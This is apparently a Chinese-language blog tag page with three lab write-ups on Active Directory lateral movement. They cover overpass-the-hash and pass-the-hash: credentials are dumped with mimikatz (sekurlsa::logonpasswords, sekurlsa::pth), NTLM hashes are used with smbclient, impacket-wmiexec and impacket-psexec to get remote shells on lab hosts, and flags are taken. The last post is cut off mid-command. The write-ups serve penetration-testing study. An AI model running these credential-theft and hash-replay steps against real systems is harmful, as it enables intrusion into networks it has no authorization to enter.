發表文章

目前顯示的是有「pth」標籤的文章

Active Directory 中的橫向移動 - OPtH

圖片
 Active Directory 中的橫向移動 - OPtH 透過overpass the hash,我們可以「過度」濫用 NTLM 使用者哈希來獲得完整的 Kerberos 票證授予票證(TGT)。然後我們可以使用 TGT 來取得票據授予服務(TGS)。 先用已知的帳號密碼 jeff / HenchmanPutridBonbon11 登入到 Client76 └─$ xfreerdp /u:jeff /p:'HenchmanPutridBonbon11' /d:corp.com /v:192.168.191.76 按住 Shift 與滑鼠右鍵開啟某文字檔用另外一個使用者身分 這裡我們用網域的帳號密碼 jen / Nexus123! 來執行 Notepad 開啟後沒有任何需要,目的是要 jen 的憑證本機快取,所以可以直接關掉 接著直接執行 mimikatz,標準步驟 privilege::debug 再 sekurlsa::logonpasswords 目的是 jen 的 NTLM HASH "369def79d8372408bf6e93364cc93075" 接著一樣使用 mimikatz 工具執行 sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell 雖然使用的是 HASH PtH 驗證,但本質會將 NTLM 雜湊轉換為 Kerberos 票證並避免使用 NTLM 驗證,這是 sekurlsa::pth 指令的結果 如下圖,執行完畢後可以看到直接開啟了另一個 Powershell 視窗 但驗證 whoami 後卻發現是 jeff 而不是 jen,這是因為 whoami 無法檢查 Kerberos Token 執行 klist 可以看到也沒有 kerbers Token 接著我們使用 net use \\files04 後再執行一次 Klist 如下圖,可以看到都是帶入 jen 的驗證 這時候已經包含了 TGT & TGS 票眷 現在,我們已將 NTLM 雜湊轉換為 Kerberos TGT,從而允許我們使用任何依賴 Kerberos 驗證(而不是 ...

Active Directory 中的橫向移動 - PtH

圖片
 Active Directory 中的橫向移動 - PtH PtH 允許攻擊者使用使用者的 NTLM 雜湊而不是關聯的明文密碼,直接對遠端系統或服務進行身份驗證,請注意,這不適用於 Kerberos 驗證,而僅適用於使用 NTLM 驗證的伺服器或服務。 重點在於攻擊者使用伺服器訊息區塊(SMB) 協定連接到受害者,並使用 NTLM 雜湊執行身份驗證,所以目標機器必須有開啟 445 Port SMB 服務 之前拿到了 Files04 本機 Administrator 的 HASH "2892D26CDF84D7A70E2EB3B9F05C425E " 所以讓我們直接在 kali 攻擊機上使用 impacket-wmiexec 進行 PtH 如下指令 └─$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.191.73 登入後 whoami、hostname、ipconfig 看一下確實是 Files04 機器 練習 : 執行傳遞哈希技術以橫向移動到 web04 以取得位於管理員桌面上的標誌 直接執行指令 └─$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.191.72 看來每一台的 Administrator 使用的密碼都一樣,可以登入那就直接 type 拿 flag 吧

NTLM PtH

圖片
 NTLM PtH 已知靶機 192.168.197.211,帳號 / 密碼 : gunther / password123! 透過 PTH 技術登入到靶機 192.168.197.212 並在 Administrator 桌面上找到 Flag  第一步先用已知的帳號密碼登入 192.168.197.211 登入後輸入 \\192.168.197.212\secrets,會跳出如下的帳號密碼驗證視窗 使用 gunther 與密碼 password123! 無法登入,所以看來第二台沒有該帳號權限 先抓取現有登入機器的 administrator 帳號 HASH 如下 7a38310ea6f0027ee955abed1762964b 從攻擊機直接透過 smbclient 指令,並指定使用者 administrator 然後密碼用 HASH 登入測試 └─$ smbclient \\\\192.168.197.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b 可以看到成功登入了 接下來使用 impacket 庫中的 psexec.py 腳本來拿 remote shell 由於 HASH 的格式為 "LMHash:NTHash" (LM 在現今系統已無使用,但還是要輸入不可空白) 使用如下指令登入,記得 LM Hash 要輸入一樣的長度,直接用 0 代替即可 └─$ impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.197.212 直接就拿到 remote shell 了,ipconfig 看一下確定是 192.168.197.212 那一台 直接到管理員桌面拿 flag 吧 因為 impacket 當中包含了許多指令與套件,我們可以使用另外一個 wmiexec 也可以成功拿到 remote shell,指令 └─$ impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0...